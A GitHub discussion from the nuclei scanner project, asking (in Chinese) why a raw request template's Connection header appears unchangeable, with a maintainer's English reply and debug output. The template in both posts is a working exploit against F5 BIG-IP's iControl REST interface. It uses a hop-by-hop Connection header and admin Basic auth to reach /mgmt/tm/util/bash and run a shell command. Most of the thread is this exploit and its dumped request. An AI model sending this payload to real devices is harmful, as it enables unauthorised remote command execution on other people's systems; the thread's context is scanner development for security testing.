### DISCUSSION TITLE
Connection 字段无法定义

### DISCUSSION THREAD

**Discussion by Henry4E36** [projectdiscovery/nuclei#1982] [Q&A] [answered]
```
requests:
  - raw:
    - |
      POST /mgmt/tm/util/bash HTTP/1.1
      Host: {{hostname}}
      X-F5-Auth-Token: a
      Connection: keep-alive, x-F5-Auth-Token
      Authorization: Basic YWRtaW46
      Content-Type: application/json
    

      {"command": "run", "utilCmdArgs": "-c id"}
```
使用nuclei进行验证后，发现connection字段无法定义，源码中好像是默认关闭了keep-alive，使用了unsafe:true,仍然返回的是connection:close.

**Comment by ehsandeep** [comment, marked as answer]
@Henry4E36 below template works as expected; what's the issue?

```yaml
id: test

info:
  name: test test
  author: test
  severity: info

requests:
  - raw:
    - |
      POST /mgmt/tm/util/bash HTTP/1.1
      Host: {{Hostname}}
      X-F5-Auth-Token: a
      Connection: keep-alive, x-F5-Auth-Token
      Authorization: Basic YWRtaW46
      Content-Type: application/json
    

      {"command": "run", "utilCmdArgs": "-c id"}
```

```console
echo http://0.0.0.0:8000 | nuclei -t test.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.0

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.0 (latest)
[INF] Using Nuclei Templates 9.0.0 (latest)
[INF] Templates added in last update: 5
[INF] Templates loaded for scan: 1
[INF] [payload-test] Dumped HTTP request for http://0.0.0.0:8000

POST /mgmt/tm/util/bash HTTP/1.1
Host: 0.0.0.0:8000
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Content-Length: 44
Authorization: Basic YWRtaW46
Connection: keep-alive, x-F5-Auth-Token
Content-Type: application/json
X-F5-Auth-Token: a
Accept-Encoding: gzip


{"command": "run", "utilCmdArgs": "-c id"}
```
